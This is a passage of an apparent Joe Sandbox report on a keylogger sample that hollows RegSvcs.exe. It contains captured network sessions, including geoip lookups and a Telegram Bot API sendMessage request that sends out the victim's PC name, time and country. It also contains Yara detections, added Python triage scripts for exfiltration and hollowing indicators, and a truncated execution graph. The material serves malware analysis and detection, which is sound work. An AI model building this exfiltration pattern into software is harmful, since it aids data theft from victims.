                                              2024-09-26 08:23:08 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:08 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 5 | Source: 192.168.2.4:49740 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:09 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:09 UTC | 683 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:09 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3821
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X87N6Hc%2B%2FOtexNI6wWAeWcQlUw5Podh%2BASztOLAxtGu3xPESzbvTocO954zQ06q7ZfV11cVyQO%2FqCIN0e%2BFyw914%2FzmYp3mmOoTjvUZHThFMDCwHWFO6%2B0Rmz7Fo7cyXhPNqLQLk"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9ad59918c71-EWR
                                              2024-09-26 08:23:09 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 6 | Source: 192.168.2.4:49742 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:10 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:10 UTC | 677 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:10 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3822
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpK7kzXB5R6Ajomm5y2r5bb%2BDbazytIqizqZb7STE202DOJRohzc%2BBNqsjzPtXtSEmq5WgnaU8tDp%2FuTQy1NoBMY%2BeeqWJqj9s6M2F9SiVv4N7j4KPQNDJDQbFiXxk3qklbL7w8D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9b40b8d4399-EWR
                                              2024-09-26 08:23:10 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 7 | Source: 192.168.2.4:49744 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:11 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 08:23:11 UTC | 669 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:11 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3823
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WP0VRQaYNJLScSVOc6b5w3gyUNlots2gqOhNeGcZ0PYJEzKDkupfeDjdZqoCCINeD5tSzmva3N83VK9XZpNZuUsOqUcD4WCDJS7oTr7Y17ReZp9zYhYRxf8kR3oRksv2IcYLLvM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9bb0f3242ee-EWR
                                              2024-09-26 08:23:11 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 8 | Source: 192.168.2.4:49746 | Destination: 188.114.96.34:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:12 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:13 UTC | 685 | IN | HTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:12 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3824
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEh8U4EXJZwn3DzC3rgkFioc%2Bf%2B%2F4UlqvWdEA4C32xbL%2BEK%2FClhc%2BvcJOsxm0jYOuWNXmyZmKK%2BUZ7gUWQFDwbQlK4RyZoTWSmz1z8JuNgytcNaaAWRdeSfyOqefNy%2B58CyOyEy4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9c1eaf50f65-EWR
                                              2024-09-26 08:23:13 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session ID: 9 | Source: 192.168.2.4:49747 | Destination: 149.154.167.220:443 | PID: 3152 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-09-26 08:23:13 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:13 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 08:23:13 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 08:23:13 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}
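The sessions above show two network behaviours of the injected RegSvcs.exe process: repeated lookups of the sandbox's public IP at reallyfreegeoip.org (sessions 2 to 8, one per second, each answered from Cloudflare's cache), and a single Telegram Bot API sendMessage call (session 9) whose percent-encoded text carries the victim's PC name, timestamp and country name. In the captured request the bot token segment between /bot and /sendMessage is empty, as is chat_id, and Telegram answered 404 Not Found. The following script is an added example, not part of the Joe Sandbox report or of the sample; it tags each session with those behaviours, decodes the exfiltration text back into fields, and reads the country out of the chunked geoip reply. The session records and the hex prefix are constructed from the dumps above (the geoip body is cut short, as the report's 340-byte display is), and the host list GEOIP_HOSTS is an assumption to extend with other lookup services.

```python
"""Triage of the HTTP sessions in this report (added example, not from the
report or the sample).  Inputs are constructed from the session dumps."""
import re
from urllib.parse import parse_qs, urlsplit

REGSVCS = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

# (process, Host header, request path) for sessions 2 and 9 of the report.
SESSIONS = [
    (REGSVCS, "reallyfreegeoip.org", "/xml/8.46.123.33"),
    (REGSVCS, "api.telegram.org",
     "/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0A"
     "Date%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0A"
     "Country%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20"
     "the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20"
     "storage's%20empty.%20%5D"),
]

# Leading bytes of the chunked geoip reply body, copied from "Data Raw" above
# (truncated after </CountryName>, so no complete XML document is available).
GEOIP_HEX = (
    "31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 "
    "2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 "
    "65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e "
    "74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f "
    "75 6e 74 72 79 4e 61 6d 65 3e"
)

# Lookup services seen in this report; extend with others you track (assumption).
GEOIP_HOSTS = {"reallyfreegeoip.org"}


def classify(process, host, path):
    """Tag one session with the behaviours the report attributes to the sample."""
    tags = []
    if process.rsplit("\\", 1)[-1].lower() == "regsvcs.exe":
        tags.append("lolbin-http")       # a .NET services tool has no reason to speak HTTP
    if host in GEOIP_HOSTS and path.startswith("/xml/"):
        tags.append("geoip-lookup")      # supplies the "Country Name" in the exfil text
    if host == "api.telegram.org" and re.match(r"/bot[^/]*/sendMessage", path):
        tags.append("telegram-exfil")    # sendMessage carries the stolen summary
    return tags


def telegram_message(path):
    """Recover token, chat_id and the CRLF-separated report fields from a sendMessage URL."""
    parts = urlsplit(path)
    m = re.match(r"/bot([^/]*)/(\w+)", parts.path)
    qs = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes the values
    text = qs.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        if ":" in line and not line.startswith("["):      # skip the bracketed free text
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return {"token": m.group(1), "method": m.group(2),
            "chat_id": qs.get("chat_id", [""])[0], "fields": fields}


def decode_chunk_prefix(hexdump):
    """Split a (possibly truncated) chunked body into (declared chunk size, body bytes)."""
    raw = bytes.fromhex(hexdump)
    size_line, _, body = raw.partition(b"\r\n")
    return int(size_line, 16), body


def geoip_fields(body):
    """Collect <Tag>value</Tag> pairs from an XML prefix without needing a complete document."""
    return dict(re.findall(r"<(\w+)>([^<]*)</\1>", body.decode()))


if __name__ == "__main__":
    for proc, host, path in SESSIONS:
        print(host, classify(proc, host, path))
    print(telegram_message(SESSIONS[1][2]))
    size, body = decode_chunk_prefix(GEOIP_HEX)
    print(hex(size), geoip_fields(body))
```

The chunk size line decodes to 0x14d (333 bytes), which is why the report's 340-byte display ends inside the Latitude element: the dump shows the first 340 bytes of the chunk framing, not the whole body. For detection purposes the combination "RegSvcs.exe plus geoip lookup plus api.telegram.org" is the signal; the decoded fields are what the operator would have received had the token been valid.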



                                              Target ID:0
                                              Start time:04:22:56
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\CMR_7649.EXE.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CMR_7649.EXE.exe"
                                              Imagebase:0x400000
                                              File size:1'237'203 bytes
                                              MD5 hash:B686BC08D9EC68D1746859235ECB70FD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              Target ID:1
                                              Start time:04:23:00
                                              Start date:26/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CMR_7649.EXE.exe"
                                              Imagebase:0xda0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false
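The two process records above carry the classic markers of a hollowed process: Target 1 is the legitimate RegSvcs.exe image (imagebase 0xda0000, 45'984 bytes) but its command line is the dropper's ("C:\Users\user\Desktop\CMR_7649.EXE.exe"), and the Yara hits for Snake/VIP Keylogger in that process sit at 0x402000 in a region whose dump name records page protection 0x40 (PAGE_EXECUTE_READWRITE), well below the loaded RegSvcs image. The following script is an added example, not part of the report; it encodes those two checks over records constructed from the Target 0 and Target 1 blocks. It assumes that the .sdmp name's fourth field is the region base and its fifth the page protection (the values match the PAGE_* constants), and, because the report does not give SizeOfImage, uses the on-disk file size as a stand-in for the image extent.

```python
"""Process-hollowing indicators from the report's Target 0 / Target 1 records
(added example, not from the report).  Records constructed from the page."""
import re

PROCESSES = [
    {"target": 0,
     "path": r"C:\Users\user\Desktop\CMR_7649.EXE.exe",
     "cmdline": r'"C:\Users\user\Desktop\CMR_7649.EXE.exe"',
     "imagebase": 0x400000, "file_size": 1_237_203,     # file size stands in for SizeOfImage
     "dumps": ["00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp"]},
    {"target": 1,
     "path": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "cmdline": r'"C:\Users\user\Desktop\CMR_7649.EXE.exe"',
     "imagebase": 0xDA0000, "file_size": 45_984,
     "dumps": ["00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp",
               "00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp"]},
]

PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80


def parse_dump_name(name):
    """Split a Joe Sandbox .sdmp name.  Field 0 is the target index; field 3 is taken as
    the region base and field 4 as the page protection (assumption: the values line up
    with PAGE_* constants).  The remaining fields are not interpreted."""
    parts = name.removesuffix(".sdmp").split(".")
    return {"target": int(parts[0]), "base": int(parts[3], 16), "protect": int(parts[4], 16)}


def exe_from_cmdline(cmdline):
    """First argv element of a Windows command line, quoted or bare."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def hollowing_indicators(rec):
    """Indicators that the process image was replaced after creation."""
    found = []
    # 1. The command line names a different executable than the image on disk.
    if exe_from_cmdline(rec["cmdline"]).lower() != rec["path"].lower():
        found.append("cmdline-image-mismatch")
    # 2. A writable and executable region with a Yara hit lies outside the legitimate image.
    lo, hi = rec["imagebase"], rec["imagebase"] + rec["file_size"]
    for d in map(parse_dump_name, rec["dumps"]):
        writable_exec = d["protect"] & (PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)
        if writable_exec and not lo <= d["base"] < hi:
            found.append("rwx-region-outside-image")
            break
    return found


if __name__ == "__main__":
    for rec in PROCESSES:
        print(rec["target"], rec["path"].rsplit("\\", 1)[-1], hollowing_indicators(rec))
```

Target 0 yields no indicator (its one dump is a PAGE_READWRITE heap region and its command line matches its path); Target 1 yields both. On a live host the same two checks map onto Sysmon Event ID 1 (Image versus CommandLine) and a memory scan for RWX regions that no loaded module accounts for.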


                                                Execution Graph

                                                Execution Coverage:3.5%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:37
                                                [execution_graph: node listing of the interactive graph, 2000 nodes with entry node 4010e0 (addresses consistent with the submitted sample's image base 0x400000). Win32 and CRT calls named in the listed nodes: DefWindowProcW, Shell_NotifyIconW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, DestroyIcon, LoadStringW, RtlAllocateHeap, GetModuleHandleW, GetProcAddress, ExitProcess, RaiseException, VariantClear; _memcpy_s, _memmove, _wcslen, _wcscpy, _wcsncpy, _malloc, __wcsicoll, __getptd_noexit, __NMSG_WRITE, ___crtCorExitProcess, std::exception. The listing is cut off at the end of the page.]
84373->84396 84376 411656 84378 4115d7 52 API calls 84377->84378 84379 4013a7 84378->84379 84379->84323 84379->84324 84381 413638 _malloc 84380->84381 84385 4135c9 _malloc 84380->84385 84402 417f77 46 API calls __getptd_noexit 84381->84402 84382 4135d4 84382->84385 84397 418901 46 API calls __NMSG_WRITE 84382->84397 84398 418752 46 API calls 8 library calls 84382->84398 84399 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84382->84399 84385->84382 84386 4135f7 RtlAllocateHeap 84385->84386 84389 413624 84385->84389 84392 413622 84385->84392 84386->84385 84387 413630 84386->84387 84387->84368 84400 417f77 46 API calls __getptd_noexit 84389->84400 84401 417f77 46 API calls __getptd_noexit 84392->84401 84394->84370 84395->84373 84396->84376 84397->84382 84398->84382 84400->84392 84401->84387 84402->84387 84403->84355 84405 40c619 84404->84405 84406 40c60a 84404->84406 84405->84350 84406->84405 84409 4026f0 84406->84409 84408 426d7a _memmove 84408->84350 84410 426873 84409->84410 84411 4026ff 84409->84411 84412 4013a0 52 API calls 84410->84412 84411->84408 84413 42687b 84412->84413 84414 4115d7 52 API calls 84413->84414 84415 42689e _memmove 84414->84415 84415->84408 84416->84361 84417->84312 84418 40bd20 84419 428194 84418->84419 84420 40bd2d 84418->84420 84421 40bd43 84419->84421 84422 4281bc 84419->84422 84424 4281b2 84419->84424 84428 40bd37 84420->84428 84441 4531b1 85 API calls 5 library calls 84420->84441 84440 45e987 86 API calls moneypunct 84422->84440 84439 40b510 VariantClear 84424->84439 84430 40bd50 84428->84430 84429 4281ba 84431 426cf1 84430->84431 84432 40bd63 84430->84432 84451 44cde9 52 API calls _memmove 84431->84451 84442 40bd80 84432->84442 84435 40bd73 84435->84421 84436 426cfc 84437 40e0a0 52 API calls 84436->84437 84438 426d02 84437->84438 84439->84429 84440->84420 84441->84428 84443 40bd8e 84442->84443 84444 40bdb7 _memmove 84442->84444 84443->84444 84445 40bded 84443->84445 84446 40bdad 84443->84446 84444->84435 84448 
